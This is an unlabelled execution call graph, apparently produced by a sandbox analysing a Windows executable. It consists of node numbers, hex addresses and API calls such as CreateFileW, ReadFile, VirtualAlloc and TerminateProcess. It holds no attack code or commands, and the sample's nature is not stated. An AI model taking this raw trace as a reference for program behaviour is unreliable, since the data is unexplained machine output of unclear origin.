                    execution_graph 97974 e8568a 97981 e85c18 97974->97981 97979 e856ba Mailbox 97993 ea0ff6 97981->97993 97983 e85c2b 97984 ea0ff6 Mailbox 59 API calls 97983->97984 97985 e8569c 97984->97985 97986 e85632 97985->97986 98031 e85a2f 97986->98031 97988 e85643 97990 e85674 97988->97990 98038 e85d20 97988->98038 98044 e85bda 59 API calls 2 library calls 97988->98044 97990->97979 97992 e881c1 61 API calls Mailbox 97990->97992 97992->97979 97996 ea0ffe 97993->97996 97995 ea1018 97995->97983 97996->97995 97998 ea101c std::exception::exception 97996->97998 98003 ea594c 97996->98003 98020 ea35e1 RtlDecodePointer 97996->98020 98021 ea87db RaiseException 97998->98021 98000 ea1046 98022 ea8711 58 API calls _free 98000->98022 98002 ea1058 98002->97983 98004 ea59c7 98003->98004 98014 ea5958 98003->98014 98029 ea35e1 RtlDecodePointer 98004->98029 98006 ea59cd 98030 ea8d68 58 API calls __getptd_noexit 98006->98030 98007 ea5963 98007->98014 98023 eaa3ab 58 API calls __NMSG_WRITE 98007->98023 98024 eaa408 58 API calls 4 library calls 98007->98024 98025 ea32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98007->98025 98010 ea598b RtlAllocateHeap 98011 ea59bf 98010->98011 98010->98014 98011->97996 98013 ea59b3 98027 ea8d68 58 API calls __getptd_noexit 98013->98027 98014->98007 98014->98010 98014->98013 98018 ea59b1 98014->98018 98026 ea35e1 RtlDecodePointer 98014->98026 98028 ea8d68 58 API calls __getptd_noexit 98018->98028 98020->97996 98021->98000 98022->98002 98023->98007 98024->98007 98026->98014 98027->98018 98028->98011 98029->98006 98030->98011 98032 e85a40 98031->98032 98033 ebe065 98031->98033 98032->97988 98045 ed6443 59 API calls Mailbox 98033->98045 98035 ebe06f 98036 ea0ff6 Mailbox 59 API calls 98035->98036 98037 ebe07b 98036->98037 98039 e85d93 98038->98039 98041 e85d2e 98038->98041 98046 e85dae SetFilePointerEx 98039->98046 98040 e85d56 98040->97988 98041->98040 98043 e85d66 ReadFile 98041->98043 98043->98040 98043->98041 98044->97988 98045->98035 98046->98041 98047 e8e70b 98050 e8d260 98047->98050 98049 e8e719 98051 e8d27d 98050->98051 98079 e8d4dd 98050->98079 98052 ec2b0a 98051->98052 98053 ec2abb 98051->98053 98082 e8d2a4 98051->98082 98124 efa6fb 340 API calls __cinit 98052->98124 98056 ec2abe 98053->98056 98061 ec2ad9 98053->98061 98057 ec2aca 98056->98057 98056->98082 98122 efad0f 340 API calls 98057->98122 98061->98079 98123 efb1b7 340 API calls 3 library calls 98061->98123 98062 e8d594 98113 e88bb2 68 API calls 98062->98113 98063 ec2cdf 98063->98063 98064 e8d6ab 98064->98049 98068 e8d5a3 98068->98049 98069 ec2c26 98132 efaa66 89 API calls 98069->98132 98079->98064 98133 eea0b5 89 API calls 4 library calls 98079->98133 98082->98062 98082->98064 98082->98069 98082->98079 98084 e8a000 98082->98084 98107 e888a0 68 API calls __cinit 98082->98107 98108 e886a2 68 API calls 98082->98108 98109 e88620 98082->98109 98114 e8859a 68 API calls 98082->98114 98115 e8d0dc 340 API calls 98082->98115 98116 e89f3a 59 API calls Mailbox 98082->98116 98117 ea2f80 98082->98117 98120 e8d060 89 API calls 98082->98120 98121 e8cedd 340 API calls 98082->98121 98125 e88bb2 68 API calls 98082->98125 98126 e89e9c 60 API calls Mailbox 98082->98126 98127 ed6d03 60 API calls 98082->98127 98128 e881a7 98082->98128 98085 e8a01f 98084->98085 98100 e8a04d Mailbox 98084->98100 98086 ea0ff6 Mailbox 59 API calls 98085->98086 98086->98100 98087 ea2f80 67 API calls __cinit 98087->98100 98088 e8b5d5 98089 e881a7 59 API calls 98088->98089 98102 e8a1b7 98089->98102 98090 ed7405 59 API calls 98090->98100 98091 e877c7 59 API calls 98091->98100 98092 ea0ff6 59 API calls Mailbox 98092->98100 98096 ec047f 98136 eea0b5 89 API calls 4 library calls 98096->98136 98098 e881a7 59 API calls 98098->98100 98100->98087 98100->98088 98100->98090 98100->98091 98100->98092 98100->98096 98100->98098 98100->98102 98103 ec0e00 98100->98103 98105 e8a6ba 98100->98105 98106 e8b5da 98100->98106 98134 e8ca20 340 API calls 2 library calls 98100->98134 98135 e8ba60 60 API calls Mailbox 98100->98135 98101 ec048e 98101->98082 98102->98082 98138 eea0b5 89 API calls 4 library calls 98103->98138 98137 eea0b5 89 API calls 4 library calls 98105->98137 98139 eea0b5 89 API calls 4 library calls 98106->98139 98107->98082 98108->98082 98112 e8862b 98109->98112 98111 e88652 98111->98082 98112->98111 98140 e88b13 69 API calls Mailbox 98112->98140 98113->98068 98114->98082 98115->98082 98116->98082 98141 ea2e84 98117->98141 98119 ea2f8b 98119->98082 98120->98082 98121->98082 98122->98064 98123->98079 98124->98082 98125->98082 98126->98082 98127->98082 98129 e881ba 98128->98129 98130 e881b2 98128->98130 98129->98082 98219 e880d7 98130->98219 98132->98079 98133->98063 98134->98100 98135->98100 98136->98101 98137->98102 98138->98106 98139->98102 98140->98111 98142 ea2e90 _raise 98141->98142 98149 ea3457 98142->98149 98148 ea2eb7 _raise 98148->98119 98166 ea9e4b 98149->98166 98151 ea2e99 98152 ea2ec8 RtlDecodePointer RtlDecodePointer 98151->98152 98153 ea2ea5 98152->98153 98154 ea2ef5 98152->98154 98163 ea2ec2 98153->98163 98154->98153 98212 ea89e4 59 API calls __wctomb_s_l 98154->98212 98156 ea2f58 RtlEncodePointer RtlEncodePointer 98156->98153 98157 ea2f2c 98157->98153 98161 ea2f46 RtlEncodePointer 98157->98161 98214 ea8aa4 61 API calls 2 library calls 98157->98214 98158 ea2f07 98158->98156 98158->98157 98213 ea8aa4 61 API calls 2 library calls 98158->98213 98161->98156 98162 ea2f40 98162->98153 98162->98161 98215 ea3460 98163->98215 98167 ea9e6f RtlEnterCriticalSection 98166->98167 98168 ea9e5c 98166->98168 98167->98151 98173 ea9ed3 98168->98173 98170 ea9e62 98170->98167 98197 ea32f5 58 API calls 3 library calls 98170->98197 98174 ea9edf _raise 98173->98174 98175 ea9ee8 98174->98175 98176 ea9f00 98174->98176 98198 eaa3ab 58 API calls __NMSG_WRITE 98175->98198 98185 ea9f21 _raise 98176->98185 98201 ea8a5d 58 API calls 2 library calls 98176->98201 98178 ea9eed 98199 eaa408 58 API calls 4 library calls 98178->98199 98181 ea9f15 98183 ea9f2b 98181->98183 98184 ea9f1c 98181->98184 98182 ea9ef4 98200 ea32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98182->98200 98186 ea9e4b __lock 58 API calls 98183->98186 98202 ea8d68 58 API calls __getptd_noexit 98184->98202 98185->98170 98189 ea9f32 98186->98189 98191 ea9f3f 98189->98191 98192 ea9f57 98189->98192 98203 eaa06b InitializeCriticalSectionAndSpinCount 98191->98203 98204 ea2f95 98192->98204 98195 ea9f4b 98210 ea9f73 RtlLeaveCriticalSection _doexit 98195->98210 98198->98178 98199->98182 98201->98181 98202->98185 98203->98195 98205 ea2fc7 __dosmaperr 98204->98205 98206 ea2f9e RtlFreeHeap 98204->98206 98205->98195 98206->98205 98207 ea2fb3 98206->98207 98211 ea8d68 58 API calls __getptd_noexit 98207->98211 98209 ea2fb9 GetLastError 98209->98205 98210->98185 98211->98209 98212->98158 98213->98157 98214->98162 98218 ea9fb5 RtlLeaveCriticalSection 98215->98218 98217 ea2ec7 98217->98148 98218->98217 98221 e880e7 98219->98221 98222 e880fa _memmove 98219->98222 98220 ea0ff6 Mailbox 59 API calls 98220->98222 98221->98220 98221->98222 98222->98129 98223 e8b56e 98230 e9fb84 98223->98230 98225 e8b584 98239 e8c707 98225->98239 98227 e8b5ac 98229 e8a4e8 98227->98229 98251 eea0b5 89 API calls 4 library calls 98227->98251 98231 e9fb90 98230->98231 98232 e9fba2 98230->98232 98252 e89e9c 60 API calls Mailbox 98231->98252 98234 e9fba8 98232->98234 98235 e9fbd1 98232->98235 98237 ea0ff6 Mailbox 59 API calls 98234->98237 98253 e89e9c 60 API calls Mailbox 98235->98253 98238 e9fb9a 98237->98238 98238->98225 98241 e8c72c _wcscmp 98239->98241 98254 e87b76 98239->98254 98242 e8c760 Mailbox 98241->98242 98259 e87f41 98241->98259 98242->98227 98248 ec1ad7 98250 ec1adb Mailbox 98248->98250 98273 e89e9c 60 API calls Mailbox 98248->98273 98250->98227 98251->98229 98252->98238 98253->98238 98255 ea0ff6 Mailbox 59 API calls 98254->98255 98256 e87b9b 98255->98256 98274 e88189 98256->98274 98260 e87f50 __NMSG_WRITE _memmove 98259->98260 98261 ea0ff6 Mailbox 59 API calls 98260->98261 98262 e87f8e 98261->98262 98263 e87c8e 98262->98263 98264 e87ca0 98263->98264 98265 ebf094 98263->98265 98277 e87bb1 98264->98277 98283 ed8123 59 API calls _memmove 98265->98283 98268 e87cac 98272 e8859a 68 API calls 98268->98272 98269 ebf09e 98270 e881a7 59 API calls 98269->98270 98271 ebf0a6 Mailbox 98270->98271 98272->98248 98273->98250 98275 ea0ff6 Mailbox 59 API calls 98274->98275 98276 e87baa 98275->98276 98276->98241 98278 e87be5 _memmove 98277->98278 98279 e87bbf 98277->98279 98278->98268 98278->98278 98279->98278 98280 ea0ff6 Mailbox 59 API calls 98279->98280 98281 e87c34 98280->98281 98282 ea0ff6 Mailbox 59 API calls 98281->98282 98282->98278 98283->98269 98284 ec0226 98290 e8ade2 Mailbox 98284->98290 98286 ec0c86 98400 ed66f4 98286->98400 98288 ec0c8f 98290->98286 98290->98288 98291 ec00e0 VariantClear 98290->98291 98292 e8b6c1 98290->98292 98298 eed2e6 98290->98298 98345 ef474d 98290->98345 98354 e92123 98290->98354 98394 efe237 98290->98394 98397 e89df0 59 API calls Mailbox 98290->98397 98398 ed7405 59 API calls 98290->98398 98291->98290 98399 eea0b5 89 API calls 4 library calls 98292->98399 98299 eed310 98298->98299 98300 eed305 98298->98300 98343 eed3ea Mailbox 98299->98343 98435 e877c7 98299->98435 98434 e89c9c 59 API calls 98300->98434 98302 ea0ff6 Mailbox 59 API calls 98303 eed433 98302->98303 98305 eed43f 98303->98305 98496 e85906 60 API calls Mailbox 98303->98496 98403 e89997 98305->98403 98308 e877c7 59 API calls 98310 eed33d 98308->98310 98312 e89997 84 API calls 98310->98312 98314 eed349 98312->98314 98440 e846f9 98314->98440 98317 eed49e 98323 eed4c9 98317->98323 98324 eed500 98317->98324 98318 eed46a GetLastError 98320 eed483 98318->98320 98319 eed35e 98321 e87c8e 59 API calls 98319->98321 98334 eed3f3 Mailbox 98320->98334 98497 e85a1a CloseHandle 98320->98497 98322 eed391 98321->98322 98325 eed3e3 98322->98325 98491 ee3e73 98322->98491 98327 ea0ff6 Mailbox 59 API calls 98323->98327 98326 ea0ff6 Mailbox 59 API calls 98324->98326 98495 e89c9c 59 API calls 98325->98495 98331 eed505 98326->98331 98332 eed4ce 98327->98332 98331->98334 98337 e877c7 59 API calls 98331->98337 98335 eed4df 98332->98335 98338 e877c7 59 API calls 98332->98338 98334->98290 98498 eef835 59 API calls 2 library calls 98335->98498 98336 eed3a5 98340 e87f41 59 API calls 98336->98340 98337->98334 98338->98335 98341 eed3b2 98340->98341 98494 ee3c66 63 API calls Mailbox 98341->98494 98343->98302 98343->98334 98344 eed3bb Mailbox 98344->98325 98346 e89997 84 API calls 98345->98346 98347 ef4787 98346->98347 98594 e863a0 98347->98594 98349 ef4797 98350 ef47bc 98349->98350 98351 e8a000 340 API calls 98349->98351 98353 ef47c0 98350->98353 98619 e89bf8 98350->98619 98351->98350 98353->98290 98355 e89bf8 59 API calls 98354->98355 98356 e9213b 98355->98356 98358 ea0ff6 Mailbox 59 API calls 98356->98358 98361 ec69af 98356->98361 98359 e92154 98358->98359 98360 e92164 98359->98360 98667 e85906 60 API calls Mailbox 98359->98667 98364 e89997 84 API calls 98360->98364 98362 e92189 98361->98362 98670 eef7df 59 API calls 98361->98670 98370 e92196 98362->98370 98671 e89c9c 59 API calls 98362->98671 98365 e92172 98364->98365 98368 e85956 67 API calls 98365->98368 98367 ec69f7 98369 ec69ff 98367->98369 98367->98370 98371 e92181 98368->98371 98672 e89c9c 59 API calls 98369->98672 98373 e85e3f 2 API calls 98370->98373 98371->98361 98371->98362 98669 e85a1a CloseHandle 98371->98669 98374 e9219d 98373->98374 98376 ec6a11 98374->98376 98377 e921b7 98374->98377 98379 ea0ff6 Mailbox 59 API calls 98376->98379 98378 e877c7 59 API calls 98377->98378 98380 e921bf 98378->98380 98381 ec6a17 98379->98381 98646 e856d2 98380->98646 98383 ec6a2b 98381->98383 98673 e859b0 ReadFile SetFilePointerEx 98381->98673 98388 ec6a2f _memmove 98383->98388 98674 ee794e 59 API calls 2 library calls 98383->98674 98384 e921ce 98384->98388 98661 e89b9c 98384->98661 98389 e921e2 Mailbox 98390 e9221c 98389->98390 98391 e85dcf CloseHandle 98389->98391 98390->98290 98392 e92210 98391->98392 98392->98390 98668 e85a1a CloseHandle 98392->98668 98678 efcdf1 98394->98678 98396 efe247 98396->98290 98397->98290 98398->98290 98399->98286 98789 ed6636 98400->98789 98402 ed6702 98402->98288 98404 e899b1 98403->98404 98413 e899ab 98403->98413 98405 e899b7 __itow 98404->98405 98406 e899f9 98404->98406 98407 ebf9fc __i64tow 98404->98407 98409 ebf903 98404->98409 98410 ea0ff6 Mailbox 59 API calls 98405->98410 98499 ea38d8 83 API calls 3 library calls 98406->98499 98407->98407 98414 ea0ff6 Mailbox 59 API calls 98409->98414 98420 ebf97b Mailbox _wcscpy 98409->98420 98412 e899d1 98410->98412 98412->98413 98415 e87f41 59 API calls 98412->98415 98421 e85956 98413->98421 98416 ebf948 98414->98416 98415->98413 98417 ea0ff6 Mailbox 59 API calls 98416->98417 98418 ebf96e 98417->98418 98419 e87f41 59 API calls 98418->98419 98418->98420 98419->98420 98500 ea38d8 83 API calls 3 library calls 98420->98500 98501 e85dcf 98421->98501 98425 e859a4 98425->98317 98425->98318 98426 e85981 98426->98425 98513 e85770 98426->98513 98428 e85993 98530 e853db SetFilePointerEx SetFilePointerEx 98428->98530 98430 ebe030 98531 ee3696 SetFilePointerEx SetFilePointerEx WriteFile 98430->98531 98431 e8599a 98431->98425 98431->98430 98433 ebe060 98433->98425 98434->98299 98436 ea0ff6 Mailbox 59 API calls 98435->98436 98437 e877e8 98436->98437 98438 ea0ff6 Mailbox 59 API calls 98437->98438 98439 e877f6 98438->98439 98439->98308 98441 e877c7 59 API calls 98440->98441 98442 e8470f 98441->98442 98443 e877c7 59 API calls 98442->98443 98444 e84717 98443->98444 98445 e877c7 59 API calls 98444->98445 98446 e8471f 98445->98446 98447 e877c7 59 API calls 98446->98447 98448 e84727 98447->98448 98449 ebd8fb 98448->98449 98450 e8475b 98448->98450 98451 e881a7 59 API calls 98449->98451 98452 e879ab 59 API calls 98450->98452 98453 ebd904 98451->98453 98454 e84769 98452->98454 98570 e87eec 98453->98570 98563 e87e8c 98454->98563 98457 e84773 98458 e8479e 98457->98458 98459 e879ab 59 API calls 98457->98459 98461 e847bd 98458->98461 98462 ebd924 98458->98462 98477 e847de 98458->98477 98463 e84794 98459->98463 98567 e87b52 98461->98567 98465 ebd9f4 98462->98465 98474 ebd9dd 98462->98474 98485 ebd95b 98462->98485 98466 e87e8c 59 API calls 98463->98466 98464 e847ef 98469 e84801 98464->98469 98471 e881a7 59 API calls 98464->98471 98470 e87d2c 59 API calls 98465->98470 98466->98458 98473 e881a7 59 API calls 98469->98473 98476 e84811 98469->98476 98486 ebd9b1 98470->98486 98471->98469 98472 e879ab 59 API calls 98472->98477 98473->98476 98474->98465 98482 ebd9c8 98474->98482 98475 e84818 98479 e881a7 59 API calls 98475->98479 98488 e8481f Mailbox 98475->98488 98476->98475 98478 e881a7 59 API calls 98476->98478 98550 e879ab 98477->98550 98478->98475 98479->98488 98480 e87b52 59 API calls 98480->98486 98481 ebd9b9 98483 e87d2c 59 API calls 98481->98483 98484 e87d2c 59 API calls 98482->98484 98483->98486 98484->98486 98485->98481 98489 ebd9a4 98485->98489 98486->98477 98486->98480 98583 e87a84 59 API calls 2 library calls 98486->98583 98488->98319 98574 e87d2c 98489->98574 98590 ee4696 GetFileAttributesW 98491->98590 98494->98344 98495->98343 98496->98305 98497->98334 98498->98334 98499->98405 98500->98407 98502 e85de8 98501->98502 98503 e85962 98501->98503 98502->98503 98504 e85ded CloseHandle 98502->98504 98505 e85df9 98503->98505 98504->98503 98506 ebe181 98505->98506 98507 e85e12 CreateFileW 98505->98507 98508 e85e34 98506->98508 98509 ebe187 CreateFileW 98506->98509 98507->98508 98508->98426 98509->98508 98510 ebe1ad 98509->98510 98532 e85c4e 98510->98532 98514 e8578b 98513->98514 98515 ebdfce 98513->98515 98516 e85c4e 2 API calls 98514->98516 98525 e8581a 98514->98525 98515->98525 98545 e85e3f 98515->98545 98517 e857ad 98516->98517 98542 e8538e 98517->98542 98521 e857c4 98522 ea0ff6 Mailbox 59 API calls 98521->98522 98523 e857cf 98522->98523 98524 e8538e 59 API calls 98523->98524 98526 e857da 98524->98526 98525->98428 98527 e85d20 2 API calls 98526->98527 98528 e85807 98527->98528 98529 e85c4e 2 API calls 98528->98529 98529->98525 98530->98431 98531->98433 98539 e85c68 98532->98539 98533 e85cef SetFilePointerEx 98540 e85dae SetFilePointerEx 98533->98540 98534 ebe151 98541 e85dae SetFilePointerEx 98534->98541 98537 e85cc3 98537->98508 98538 ebe16b 98539->98533 98539->98534 98539->98537 98540->98537 98541->98538 98543 ea0ff6 Mailbox 59 API calls 98542->98543 98544 e853a0 98543->98544 98544->98515 98544->98521 98546 e85c4e 2 API calls 98545->98546 98547 e85e60 98546->98547 98548 e85c4e 2 API calls 98547->98548 98549 e85e74 98548->98549 98549->98525 98551 e879ba 98550->98551 98552 e87a17 98550->98552 98551->98552 98554 e879c5 98551->98554 98553 e87e8c 59 API calls 98552->98553 98560 e879e8 _memmove 98553->98560 98555 e879e0 98554->98555 98556 ebef32 98554->98556 98584 e88087 59 API calls Mailbox 98555->98584 98557 e88189 59 API calls 98556->98557 98559 ebef3c 98557->98559 98561 ea0ff6 Mailbox 59 API calls 98559->98561 98560->98464 98562 ebef5c 98561->98562 98564 e87e9a 98563->98564 98566 e87ea3 _memmove 98563->98566 98564->98566 98585 e87faf 98564->98585 98566->98457 98568 e87faf 59 API calls 98567->98568 98569 e847c7 98568->98569 98569->98472 98569->98477 98571 e87ef9 98570->98571 98572 e87f06 98570->98572 98571->98458 98573 ea0ff6 Mailbox 59 API calls 98572->98573 98573->98571 98575 e87d38 __NMSG_WRITE 98574->98575 98576 e87da5 98574->98576 98578 e87d4e 98575->98578 98579 e87d73 98575->98579 98577 e87e8c 59 API calls 98576->98577 98582 e87d56 _memmove 98577->98582 98589 e88087 59 API calls Mailbox 98578->98589 98581 e88189 59 API calls 98579->98581 98581->98582 98582->98486 98583->98486 98584->98560 98586 e87fc2 98585->98586 98588 e87fbf _memmove 98585->98588 98587 ea0ff6 Mailbox 59 API calls 98586->98587 98587->98588 98588->98566 98589->98582 98591 ee46b1 FindFirstFileW 98590->98591 98593 ee3e7a 98590->98593 98592 ee46c6 FindClose 98591->98592 98591->98593 98592->98593 98593->98325 98593->98336 98595 e87b76 59 API calls 98594->98595 98614 e863c5 98595->98614 98596 e865ca 98634 e8766f 98596->98634 98598 e865e4 Mailbox 98598->98349 98601 ebe41f 98644 edfdba 91 API calls 4 library calls 98601->98644 98602 e87eec 59 API calls 98602->98614 98603 e8766f 59 API calls 98603->98614 98607 ebe42d 98608 e8766f 59 API calls 98607->98608 98609 ebe443 98608->98609 98609->98598 98610 e868f9 _memmove 98645 edfdba 91 API calls 4 library calls 98610->98645 98611 ebe3bb 98612 e88189 59 API calls 98611->98612 98613 ebe3c6 98612->98613 98618 ea0ff6 Mailbox 59 API calls 98613->98618 98614->98596 98614->98601 98614->98602 98614->98603 98614->98610 98614->98611 98616 e87faf 59 API calls 98614->98616 98632 e860cc 60 API calls 98614->98632 98633 e85ea1 59 API calls Mailbox 98614->98633 98642 e85fd2 60 API calls 98614->98642 98643 e87a84 59 API calls 2 library calls 98614->98643 98617 e8659b CharUpperBuffW 98616->98617 98617->98614 98618->98610 98620 e89c08 98619->98620 98621 ebfbff 98619->98621 98625 ea0ff6 Mailbox 59 API calls 98620->98625 98622 ebfc10 98621->98622 98624 e87d2c 59 API calls 98621->98624 98623 e87eec 59 API calls 98622->98623 98628 ebfc1a 98623->98628 98624->98622 98626 e89c1b 98625->98626 98626->98628 98629 e89c26 98626->98629 98627 e89c34 98627->98353 98628->98627 98630 e877c7 59 API calls 98628->98630 98629->98627 98631 e87f41 59 API calls 98629->98631 98630->98627 98631->98627 98632->98614 98633->98614 98635 e8770f 98634->98635 98638 e87682 _memmove 98634->98638 98637 ea0ff6 Mailbox 59 API calls 98635->98637 98636 ea0ff6 Mailbox 59 API calls 98639 e87689 98636->98639 98637->98638 98638->98636 98640 ea0ff6 Mailbox 59 API calls 98639->98640 98641 e876b2 98639->98641 98640->98641 98641->98598 98642->98614 98643->98614 98644->98607 98645->98598 98647 e856dd 98646->98647 98648 e85702 98646->98648 98647->98648 98652 e856ec 98647->98652 98649 e87eec 59 API calls 98648->98649 98653 ee349a 98649->98653 98650 ee34c9 98650->98384 98654 e85c18 59 API calls 98652->98654 98653->98650 98675 ee3436 ReadFile SetFilePointerEx 98653->98675 98676 e87a84 59 API calls 2 library calls 98653->98676 98655 ee35ba 98654->98655 98657 e85632 61 API calls 98655->98657 98658 ee35c8 98657->98658 98660 ee35d8 Mailbox 98658->98660 98677 e8793a 61 API calls Mailbox 98658->98677 98660->98384 98662 e89ba8 98661->98662 98663 e89be7 98661->98663 98665 ea0ff6 Mailbox 59 API calls 98662->98665 98664 e881a7 59 API calls 98663->98664 98666 e89bbb 98664->98666 98665->98666 98666->98389 98667->98360 98668->98390 98669->98361 98670->98361 98671->98367 98672->98374 98673->98383 98674->98388 98675->98653 98676->98653 98677->98660 98679 e89997 84 API calls 98678->98679 98680 efce2e 98679->98680 98703 efce75 Mailbox 98680->98703 98716 efdab9 98680->98716 98682 efd0cd 98683 efd242 98682->98683 98688 efd0db 98682->98688 98766 efdbdc 92 API calls Mailbox 98683->98766 98686 efd251 98686->98688 98689 efd25d 98686->98689 98687 e89997 84 API calls 98706 efcec6 Mailbox 98687->98706 98729 efcc82 98688->98729 98689->98703 98694 efd114 98744 ea0e48 98694->98744 98697 efd12e 98750 eea0b5 89 API calls 4 library calls 98697->98750 98698 efd147 98751 e8942e 98698->98751 98701 efd139 GetCurrentProcess TerminateProcess 98701->98698 98703->98396 98706->98682 98706->98687 98706->98703 98748 eef835 59 API calls 2 library calls 98706->98748 98749 efd2f3 61 API calls 2 library calls 98706->98749 98707 efd2b8 98707->98703 98712 efd2cc FreeLibrary 98707->98712 98709 efd17f 98763 efd95d 107 API calls _free 98709->98763 98712->98703 98715 efd190 98715->98707 98764 e88ea0 59 API calls Mailbox 98715->98764 98765 e89e9c 60 API calls Mailbox 98715->98765 98767 efd95d 107 API calls _free 98715->98767 98717 e87faf 59 API calls 98716->98717 98718 efdad4 CharLowerBuffW 98717->98718 98768 edf658 98718->98768 98722 e877c7 59 API calls 98723 efdb0d 98722->98723 98724 e879ab 59 API calls 98723->98724 98725 efdb24 98724->98725 98726 e87e8c 59 API calls 98725->98726 98727 efdb30 Mailbox 98726->98727 98728 efdb6c Mailbox 98727->98728 98775 efd2f3 61 API calls 2 library calls 98727->98775 98728->98706 98730 efcc9d 98729->98730 98734 efccf2 98729->98734 98731 ea0ff6 Mailbox 59 API calls 98730->98731 98733 efccbf 98731->98733 98732 ea0ff6 Mailbox 59 API calls 98732->98733 98733->98732 98733->98734 98735 efdd64 98734->98735 98736 efdf8d Mailbox 98735->98736 98743 efdd87 _strcat _wcscpy __NMSG_WRITE 98735->98743 98736->98694 98737 e89d46 59 API calls 98737->98743 98738 e89c9c 59 API calls 98738->98743 98739 e89cf8 59 API calls 98739->98743 98740 e89997 84 API calls 98740->98743 98741 ea594c 58 API calls std::exception::_Copy_str 98741->98743 98743->98736 98743->98737 98743->98738 98743->98739 98743->98740 98743->98741 98778 ee5b29 61 API calls 2 library calls 98743->98778 98745 ea0e5d 98744->98745 98746 ea0ef5 VirtualAlloc 98745->98746 98747 ea0ec3 98745->98747 98746->98747 98747->98697 98747->98698 98748->98706 98749->98706 98750->98701 98752 e89436 98751->98752 98753 ea0ff6 Mailbox 59 API calls 98752->98753 98754 e89444 98753->98754 98755 e89450 98754->98755 98779 e8935c 59 API calls Mailbox 98754->98779 98757 e891b0 98755->98757 98780 e892c0 98757->98780 98759 e891bf 98760 ea0ff6 Mailbox 59 API calls 98759->98760 98761 e8925b 98759->98761 98760->98761 98761->98715 98762 e88ea0 59 API calls Mailbox 98761->98762 98762->98709 98763->98715 98764->98715 98765->98715 98766->98686 98767->98715 98769 edf683 __NMSG_WRITE 98768->98769 98770 edf769 98769->98770 98771 edf6b8 98769->98771 98774 edf6c2 98769->98774 98770->98774 98777 e87a24 61 API calls 98770->98777 98771->98774 98776 e87a24 61 API calls 98771->98776 98774->98722 98774->98727 98775->98728 98776->98771 98777->98770 98778->98743 98779->98755 98781 e892c9 Mailbox 98780->98781 98782 ebf5c8 98781->98782 98787 e892d3 98781->98787 98783 ea0ff6 Mailbox 59 API calls 98782->98783 98785 ebf5d4 98783->98785 98784 e892da 98784->98759 98787->98784 98788 e89df0 59 API calls Mailbox 98787->98788 98788->98787 98790 ed665e 98789->98790 98791 ed6641 98789->98791 98790->98402 98791->98790 98793 ed6621 59 API calls Mailbox 98791->98793 98793->98791 98794 ebff06 98795 ebff10 98794->98795 98798 e8ac90 Mailbox _memmove 98794->98798 98933 e88e34 59 API calls Mailbox 98795->98933 98810 e87f41 59 API calls 98798->98810 98819 e8a1b7 98798->98819 98823 e8a097 Mailbox 98798->98823 98824 ed66f4 Mailbox 59 API calls 98798->98824 98826 e8b416 98798->98826 98828 e8a000 340 API calls 98798->98828 98829 e8b685 98798->98829 98830 ec0c94 98798->98830 98832 ec0ca2 98798->98832 98835 e8b37c 98798->98835 98836 ea0ff6 59 API calls Mailbox 98798->98836 98843 e8ade2 Mailbox 98798->98843 98849 efc5f4 98798->98849 98881 ee7be0 98798->98881 98887 efbf80 98798->98887 98934 ed7405 59 API calls 98798->98934 98935 efc4a7 85 API calls 2 library calls 98798->98935 98800 ea0ff6 59 API calls Mailbox 98800->98823 98804 e8b5d5 98807 e881a7 59 API calls 98804->98807 98805 e881a7 59 API calls 98805->98823 98807->98819 98808 ec047f 98937 eea0b5 89 API calls 4 library calls 98808->98937 98810->98798 98812 e8b5da 98943 eea0b5 89 API calls 4 library calls 98812->98943 98813 ec048e 98814 e877c7 59 API calls 98814->98823 98815 ed7405 59 API calls 98815->98823 98817 ed66f4 Mailbox 59 API calls 98817->98819 98818 ec0e00 98942 eea0b5 89 API calls 4 library calls 98818->98942 98821 ea2f80 67 API calls __cinit 98821->98823 98823->98800 98823->98804 98823->98805 98823->98808 98823->98812 98823->98814 98823->98815 98823->98818 98823->98819 98823->98821 98825 e8a6ba 98823->98825 98927 e8ca20 340 API calls 2 library calls 98823->98927 98928 e8ba60 60 API calls Mailbox 98823->98928 98824->98798 98941 eea0b5 89 API calls 4 library calls 98825->98941 98932 e8f803 340 API calls 98826->98932 98828->98798 98938 eea0b5 89 API calls 4 library calls 98829->98938 98939 e89df0 59 API calls Mailbox 98830->98939 98940 eea0b5 89 API calls 4 library calls 98832->98940 98834 ec0c86 98834->98817 98834->98819 98930 e89e9c 60 API calls Mailbox 98835->98930 98836->98798 98838 e8b38d 98931 e89e9c 60 API calls Mailbox 98838->98931 98843->98819 98843->98829 98843->98834 98844 ec00e0 VariantClear 98843->98844 98845 ef474d 340 API calls 98843->98845 98846 eed2e6 101 API calls 98843->98846 98847 efe237 130 API calls 98843->98847 98848 e92123 95 API calls 98843->98848 98929 e89df0 59 API calls Mailbox 98843->98929 98936 ed7405 59 API calls 98843->98936 98844->98843 98845->98843 98846->98843 98847->98843 98848->98843 98850 e877c7 59 API calls 98849->98850 98851 efc608 98850->98851 98852 e877c7 59 API calls 98851->98852 98853 efc610 98852->98853 98854 e877c7 59 API calls 98853->98854 98855 efc618 98854->98855 98856 e89997 84 API calls 98855->98856 98880 efc626 98856->98880 98857 e87a84 59 API calls 98857->98880 98858 e87d2c 59 API calls 98858->98880 98859 efc80f 98860 efc83c Mailbox 98859->98860 98861 e89b9c 59 API calls 98859->98861 98860->98798 98861->98860 98862 efc7f6 98945 e87e0b 98862->98945 98864 efc811 98866 e87e0b 59 API calls 98864->98866 98870 efc820 98866->98870 98867 e881a7 59 API calls 98867->98880 98868 e87faf 59 API calls 98872 efc6bd CharUpperBuffW 98868->98872 98869 e87c8e 59 API calls 98869->98859 98873 e87c8e 59 API calls 98870->98873 98871 e87faf 59 API calls 98874 efc77d CharUpperBuffW 98871->98874 98944 e8859a 68 API calls 98872->98944 98873->98859 98876 e8c707 69 API calls 98874->98876 98876->98880 98877 e89997 84 API calls 98877->98880 98878 e87e0b 59 API calls 98878->98880 98879 e87c8e 59 API calls 98879->98880 98880->98857 98880->98858 98880->98859 98880->98860 98880->98862 98880->98864 98880->98867 98880->98868 98880->98871 98880->98877 98880->98878 98880->98879 98882 ee7bec 98881->98882 98883 ea0ff6 Mailbox 59 API calls 98882->98883 98884 ee7bfa 98883->98884 98885 ee7c08 98884->98885 98886 e877c7 59 API calls 98884->98886 98885->98798 98886->98885 98888 efbfab 98887->98888 98889 efbfc5 98887->98889 98957 eea0b5 89 API calls 4 library calls 98888->98957 98958 efa528 59 API calls Mailbox 98889->98958 98892 efbfd0 98893 e8a000 339 API calls 98892->98893 98894 efc031 98893->98894 98895 efc0c3 98894->98895 98899 efc072 